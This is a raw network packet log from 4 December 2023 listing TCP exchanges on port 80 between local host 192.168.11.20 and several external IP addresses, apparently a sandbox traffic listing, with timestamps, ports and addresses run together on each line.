                                                                                                                              Dec 4, 2023 15:24:29.763446093 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.763458014 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.763524055 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.763581038 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:29.763601065 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.763835907 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.763995886 CET5015980192.168.11.2091.195.240.117
                                                                                                                              Dec 4, 2023 15:24:29.946105957 CET805015991.195.240.117192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:35.206295013 CET5016080192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:35.372622967 CET8050160104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:35.373054028 CET5016080192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:35.373198986 CET5016080192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:35.538398027 CET8050160104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:35.538484097 CET8050160104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:35.538533926 CET8050160104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:35.538721085 CET5016080192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:35.548101902 CET8050160104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:35.548270941 CET5016080192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:36.879645109 CET5016080192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:37.895207882 CET5016180192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:38.060695887 CET8050161104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:38.060914040 CET5016180192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:38.061120987 CET5016180192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:38.226249933 CET8050161104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:38.226319075 CET8050161104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:38.226371050 CET8050161104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:38.226645947 CET5016180192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:39.566694975 CET5016180192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.582130909 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.747519970 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:40.747775078 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.749059916 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.749176025 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.914551020 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:40.914592028 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:40.914622068 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:40.914653063 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:40.914762974 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.914834976 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.914840937 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:40.914885044 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.914904118 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:40.915052891 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:40.915235996 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:41.080717087 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.080816031 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.080887079 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.080981970 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:41.081067085 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:41.081331015 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:41.081475019 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.081609964 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.081697941 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.081784964 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.082196951 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.247242928 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.247562885 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.247620106 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.247961044 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.248435974 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.248497963 CET8050162104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:41.248723030 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:42.253453970 CET5016280192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:43.269072056 CET5016380192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:43.434453964 CET8050163104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:43.434819937 CET5016380192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:43.434988022 CET5016380192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:43.600423098 CET8050163104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:43.600462914 CET8050163104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:43.600620031 CET8050163104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:43.600982904 CET5016380192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:43.600996971 CET5016380192.168.11.20104.232.106.165
                                                                                                                              Dec 4, 2023 15:24:43.766027927 CET8050163104.232.106.165192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:48.732307911 CET5016480192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:48.912516117 CET805016489.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:48.912858009 CET5016480192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:48.913009882 CET5016480192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:49.093250990 CET805016489.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:49.093534946 CET805016489.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:49.093599081 CET805016489.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:49.093868971 CET5016480192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:50.423650026 CET5016480192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:51.439244032 CET5016580192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:51.619570971 CET805016589.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:51.619893074 CET5016580192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:51.619982958 CET5016580192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:51.800187111 CET805016589.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:51.800884962 CET805016589.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:51.801115990 CET5016580192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:53.126132965 CET5016580192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.141876936 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.324271917 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.324481964 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.325870037 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.325954914 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506505013 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506593943 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506652117 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506701946 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506725073 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506767035 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506823063 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506830931 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.506891012 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506933928 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506973028 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.506990910 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.507164955 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.507164955 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.507347107 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.549246073 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.549499035 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.687167883 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687247992 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687294960 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687340975 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687388897 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687437057 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687475920 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.687536955 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.687602043 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687647104 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.687932014 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:54.688179016 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.688855886 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.688926935 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.688968897 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.729134083 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.729214907 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.867805004 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.867877960 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868294954 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868352890 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868518114 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.868658066 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.869205952 CET805016689.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:54.869442940 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:55.828669071 CET5016680192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:56.844209909 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.024215937 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.024406910 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.024666071 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.204422951 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205205917 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205296993 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205363989 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205600977 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205691099 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205750942 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.205806971 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:24:57.206074953 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.206074953 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.206322908 CET5016780192.168.11.2089.31.143.90
                                                                                                                              Dec 4, 2023 15:24:57.385972023 CET805016789.31.143.90192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.393482924 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:02.576035976 CET805016891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.576304913 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:02.576416016 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:02.763046980 CET805016891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.763113976 CET805016891.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:02.763333082 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:04.076800108 CET5016880192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.092360020 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.274787903 CET805016991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:05.275105953 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.275269032 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:05.459450960 CET805016991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:05.459523916 CET805016991.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:05.459851980 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:06.779454947 CET5016980192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.794922113 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.977539062 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:07.977827072 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.979127884 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:07.979233027 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.160862923 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.160912991 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161138058 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161230087 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161297083 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161313057 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161417007 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161603928 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161649942 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161739111 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.161773920 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.161889076 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.162116051 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343060970 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343354940 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343508005 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343569994 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343612909 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343678951 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343818903 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.343854904 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:08.343997955 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.344074965 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.344225883 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.344269037 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.387252092 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525466919 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525541067 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525707006 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525937080 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.525996923 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526040077 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526083946 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526124954 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526164055 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526626110 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526799917 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.526889086 CET805017091.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:08.527124882 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:09.481821060 CET5017080192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.497494936 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.679481983 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.679666996 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.679915905 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.902801991 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949726105 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949829102 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949912071 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.949990988 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950047970 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950103045 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950206995 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950299978 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950356007 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950361013 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:10.950436115 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:10.950664997 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.132544041 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132718086 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132797956 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132857084 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132914066 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.132951021 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.132970095 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.133027077 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.133028030 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.133085012 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.133141041 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:11.133218050 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.133272886 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.133491993 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.133559942 CET5017180192.168.11.2091.195.240.19
                                                                                                                              Dec 4, 2023 15:25:11.316005945 CET805017191.195.240.19192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:16.319576979 CET5017280192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:16.414376974 CET8050172172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:16.414639950 CET5017280192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:16.414796114 CET5017280192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:16.509563923 CET8050172172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:16.662198067 CET8050172172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:16.662353039 CET8050172172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:16.662545919 CET5017280192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:17.917452097 CET5017280192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:18.933300018 CET5017380192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:19.028089046 CET8050173172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:19.028438091 CET5017380192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:19.028644085 CET5017380192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:19.123155117 CET8050173172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:19.274487972 CET8050173172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:19.275795937 CET8050173172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:19.276114941 CET5017380192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:20.541889906 CET5017380192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.557656050 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.652204990 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.652446985 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.653796911 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.748383999 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748450994 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748507023 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748553038 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748586893 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.748667955 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.748708010 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748725891 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.748790979 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748847961 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748894930 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.748893976 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.748969078 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.749017000 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.749070883 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.749238014 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.749403954 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.844698906 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.844773054 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.844820976 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.844863892 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.844913006 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.844921112 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.844986916 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.844993114 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.845057964 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.845076084 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.845145941 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.845194101 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.845227003 CET5017480192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:21.845257044 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.845326900 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.845377922 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.845444918 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.939935923 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.939999104 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.940083981 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.940705061 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.940771103 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:21.940818071 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:22.158212900 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:22.158516884 CET8050174172.67.202.151192.168.11.20
                                                                                                                              Dec 4, 2023 15:25:24.183604956 CET5017580192.168.11.20172.67.202.151
                                                                                                                              Dec 4, 2023 15:25:24.279278040 CET8050175172.67.202.151192.168.11.20
